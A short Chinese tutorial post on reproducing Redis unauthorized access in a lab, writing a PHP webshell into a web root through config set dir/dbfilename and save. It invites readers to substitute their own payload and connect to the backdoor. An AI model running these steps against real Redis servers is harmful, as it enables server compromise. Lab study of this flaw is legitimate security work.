数据库服务类--Redis--未授权访问&终端Getshell

免责声明:本文仅做技术交流与学习.

目录

前提条件:

windows上开启redis服务:

Linux上创建&开启redis服务:

操作:

1-连接靶机redis

2-写入webshell

3-访问后门


redis--->webshell

Redis未授权访问漏洞复现与利用 - 知乎 (zhihu.com)

前提条件:

端口开放(6379)

目录结构清晰

windows上开启redis服务:

windows:
redis-server.exe redis.windows.conf
redis-cli.exe -h 127.0.0.1 -p 6379

Linux上创建&开启redis服务:


  
1、下载
wget http://download.redis.io/releases/redis-2.8.17.tar.gz
​
2、解压编译
tar xzvf redis-2.8.17.tar.gz  #解压安装包
cd redis-2.8.17  # 进入redis目录
make #编译
​
3、配置及启动
cd src/ #进入src目录 
cp redis-server /usr/bin/ 
cp redis-cli /usr/bin/      #将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)
cd ..   # 返回上一级目录
cp redis.conf /etc/     #将redis.conf拷贝到/etc/目录下
redis-server /etc/redis.conf  # 使用/etc/目录下的redis.conf文件中的配置启动redis服务

操作:

1-连接靶机redis

2-写入webshell

config set dir /www/wwwroot/IP
config  set dbfilename test.php
set test "<?phpphpinfo();?>"
bgsave
save

 

目录,文件名自己改

写入内容自己改...

3-访问后门路径

--上线...


相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-23 10:04:05       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-23 10:04:05       101 阅读
  3. 在Django里面运行非项目文件

    2024-04-23 10:04:05       82 阅读
  4. Python语言-面向对象

    2024-04-23 10:04:05       91 阅读

热门阅读

  1. GPT-SoVITS声音训练报错ZeroDivisionError: division by zero

    2024-04-23 10:04:05       32 阅读
  2. 分布式与微服务的区别

    2024-04-23 10:04:05       41 阅读
  3. python-读写文本数据

    2024-04-23 10:04:05       34 阅读
  4. 从零手写 tomcat

    2024-04-23 10:04:05       55 阅读
  5. STM32 ST-LINK

    2024-04-23 10:04:05       78 阅读
  6. QML与C++交互

    2024-04-23 10:04:05       38 阅读
  7. 每日一题:Spring MVC 的执行流程是什么❓

    2024-04-23 10:04:05       42 阅读
  8. 【LeetCode热题100】【图论】课程表

    2024-04-23 10:04:05       149 阅读
  9. Linux bond0 配置方法

    2024-04-23 10:04:05       32 阅读